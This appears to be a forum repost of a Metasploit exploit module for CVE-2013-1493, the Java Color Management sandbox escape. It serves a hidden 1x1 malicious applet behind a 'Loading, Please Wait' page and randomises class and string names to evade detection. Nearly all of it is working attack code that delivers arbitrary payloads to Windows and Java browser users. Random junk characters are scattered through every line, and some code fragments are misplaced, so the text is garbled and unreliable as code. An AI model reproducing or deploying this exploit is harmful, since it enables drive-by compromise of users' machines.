##7 J! H5 j* F7 d. W; p3 h
+ v+ W& ]. k; U( X' x0 v% {4 F9 b- C
# This file is part of the Metasploit Framework and may be subject to
! T8 V2 j; U+ m1 o* ^: e# redistribution and commercial restrictions. Please see the Metasploit
7 A1 l U, h }! m# q* g# web site for more information on licensing and terms of use.
% ?, G w" q; E) U" z2 Y8 _# http://metasploit.com/7 T, O# {6 _1 j' Y% _% C; k
##
, d# V- U" d, ?& @8 ^require ‘msf/core’
m& k* Z% b. c: H% k- J& D. _require ‘rex’; ^# }. N% \( W; Q' {
class Metasploit3 < Msf::Exploit::Remote* `) W- b2 q' [7 m* c- ]
Rank = NormalRanking* X% ^8 K, l. Y
include Msf::Exploit::Remote::HttpServer::HTML1 p3 @. |) i1 d
include Msf::Exploit::EXE
. ~ @4 l8 L: a7 t& Y5 jinclude Msf::Exploit::Remote::BrowserAutopwn5 j) b @) w, P+ \7 g) f
autopwn_info({ :javascript => false })& O) `0 ?( B; |
def initialize( info = {} )
; a3 \. U7 @7 w6 j, d) Usuper( update_info( info,
5 o) a7 d3 i4 t3 z8 T8 A. ]4 Z7 D‘Name’ => ‘Java CMM Remote Code Execution’,$ C- x. D6 I4 a
‘Description’ => %q{
. n: v; p- s: n$ m$ cThis module abuses the Color Management classes from a Java Applet to run B+ k, I% o8 R8 I3 J2 W* a" g
arbitrary Java code outside of the sandbox as exploited in the wild in February( v" d- `" G0 @+ i- j
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41+ W0 S I/ t! D% o8 ~. P
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
7 N0 p7 q4 S9 o& z5 esystems. This exploit doesn’t bypass click-to-play, so the user must accept the java" @& q- e& S) H' ~9 i. m2 E5 U! \
warning in order to run the malicious applet.
6 ?# c8 z7 T6 R. m5 _},7 D1 i" @# a! b5 Y; M% V! ~. B
‘License’ => MSF_LICENSE,
5 |0 W% c/ v# q) N‘Author’ =>4 g: t1 Y- d( \/ @! ]# {
'Unknown', # Vulnerability discovery and Exploit
% |+ l" j; _" Y1 n'juan vazquez' # Metasploit module (just ported the published exploit): M( f. r6 D, p4 n
],
) J. v& _ U0 K: v& L4 u‘References’ =>
6 c6 @1 i4 p/ ^1 z( c[
8 k5 w8 q5 b: Z' Y* N4 U6 W7 z[ 'CVE', '2013-1493' ],
# M) {/ I. p( u9 s4 k: f4 X[ 'OSVDB', '90737' ],
2 y! X: `% ?* j6 r7 a5 M[ 'BID', '58238' ],
% Y+ i* v- F8 Z; |! o4 J8 g[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
) |& C2 C, N! t8 f# V+ y[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ], e! R/ u( c+ v: ~( I) O9 l
[ 'URL', 'http://pastie.org/pastes/6581034' ]
* d* H# y! n! R& U$ |; M]," e' l0 P% k. v2 z$ k6 y Q- ]
‘Platform’ => [ 'win', 'java' ],( e q5 D" a+ b$ ~' Z/ t6 B2 ?3 L
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },1 N) X. Z$ `) B" G4 O F/ Q0 U
‘Targets’ =>
1 p" c4 u: z% Q. E% u0 g0 F1 c[
- A% s% z1 u4 [- c" f9 v4 C/ p, f) m[ 'Generic (Java Payload)',
7 Z4 Q q: o- ^( n{
0 u. {! O, w# ?'Platform' => 'java',
( j( {0 o% c( J$ L'Arch' => ARCH_JAVA
4 o* h+ U( X8 ]}
+ J" P# z1 t \6 X1 f( [],) E# i) w9 f9 ~
[ 'Windows x86 (Native Payload)',; |6 p, \ _6 {* K; l4 z& N
{
& x7 H( F# D/ C) }2 T2 Y( p# N, e'Platform' => 'win',% X: d. `* B) E" O: ^ v
'Arch' => ARCH_X86
' |5 v& M. {. U2 b) f}" m. C2 X0 P8 H2 `- R1 F, O ]
]
& v4 r- H# ~7 ?3 a7 @9 p+ p0 l],3 E4 P, ^, k6 w5 h2 i+ D! y
‘‘DisclosureDate’ => ‘Mar 01 2013′9 s7 N2 H' m9 N0 V! o2 ^: O
))
5 M. P; w2 V0 kend6 m$ y- N6 o4 U5 z
def setup
9 H. f* c' B8 S* W- W6 ?path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”); g$ o3 u( i2 y6 T" G8 R
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
% Z4 Z. H! t3 p1 G2 T9 N3 \path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
' v) e8 g' M# c, o@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }- K" a, t3 D) h* {' z0 N. L# C1 Z
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)+ J1 W* F. b' j
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
3 _: T5 i0 L( Opath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)1 _7 {) I. M2 A/ l
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
7 h+ ^/ K# h' K% P: n+ z1 W@init_class_name = rand_text_alpha(“Init”.length)7 p0 U2 a8 j; f; ~2 C
@init_class.gsub!(“Init”, @init_class_name)
: y! ^2 Z1 c* v9 x8 k; |. Q. \super" k* p D5 U/ B" d; W
end
2 t& _1 P9 G& ?def on_request_uri(cli, request)' y4 u9 c& A8 o. F
print_status(“handling request for #{request.uri}”)1 z2 V/ t4 O+ ~3 D/ M) p5 R
case request.uri
) y& S* H) v, r$ X; U8 ?# Uwhen /\.jar$/i
" u5 v$ H# K) M1 fjar = payload.encoded_jar
1 u( I& `/ s) ]$ ]. K/ O0 h" Ojar.add_file(“#{@init_class_name}.class”, @init_class)& A2 Z/ M( w, p! Z+ @1 G
jar.add_file(“Leak.class”, @leak_class)
9 S, G* _& F& [6 `; S$ R" ~jar.add_file(“MyBufferedImage.class”, @buffered_image_class) y* o: q+ C4 S! [% u2 B. v5 o
jar.add_file(“MyColorSpace.class”, @color_space_class)
; i8 W& y& y7 _DefaultTarget’ => 1,$ Q! @+ r9 ^; B( \- Y q( J/ m
metasploit_str = rand_text_alpha(“metasploit”.length)( K1 J( ~! m5 @
payload_str = rand_text_alpha(“payload”.length)3 C: Q/ i5 A; V5 j* t1 {# R
jar.entries.each { |entry|, ~9 Z' x+ T: p, w8 E" B3 i. W
entry.name.gsub!(“metasploit”, metasploit_str)
4 }* ^0 _9 D1 `6 a! Z& Zentry.name.gsub!(“Payload”, payload_str); {3 L+ ?/ r8 A7 H3 Y
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
; O4 K9 p+ P y2 tentry.data = entry.data.gsub(“Payload”, payload_str)
% z: l3 U/ Y: [! i1 D; U/ T7 y}
) L) f( s) e2 [+ z4 z7 tjar.build_manifest& D; N, L4 k6 I1 l5 d H8 k
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
9 g% x& w8 a8 `5 Y" P$ K" ewhen /\/$/
/ h0 n. K! A9 C* I. e" L! upayload = regenerate_payload(cli)
- ^5 f K5 M6 r7 ]if not payload+ f* p' J, r5 |1 h+ c
print_error(“Failed to generate the payload.”)
7 A% Y" F! r- [' e9 v- B, ~send_not_found(cli)" j; g/ w: \9 R
return7 j3 {. I& ^! e8 ?
end
- g9 [* |# E* {1 M$ o1 r0 @send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
* S/ {9 ]9 O/ C$ n/ }else
: M" \4 _1 @2 i- i' |. a' |4 @send_redirect(cli, get_resource() + ‘/’, ”)
5 K4 t: o* Z- P; |1 S( ^& R3 dend8 ?1 `" P2 x' c- h# k' t
end8 T1 g, N+ N3 h4 Q/ x! o/ o
def generate_html/ J8 m! X/ O$ l0 j7 E) B
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
" Y7 D* j2 \2 d$ Yhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|0 h5 v, q- C* ?$ C, M8 z
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|% K' ]& a3 Z0 v0 C& z
html += %Q|</applet></body></html>|
8 {* X' f; O; t- X G4 hreturn html/ L; t6 o8 Y5 {, i
end
. g: v1 |7 ]. l( y9 vend- ]. }# Y! k3 X! F2 l
end% F8 r4 E \4 Z" h" V* n- ~
|
发表于 2013-4-4 17:31:17
收藏
支持
反对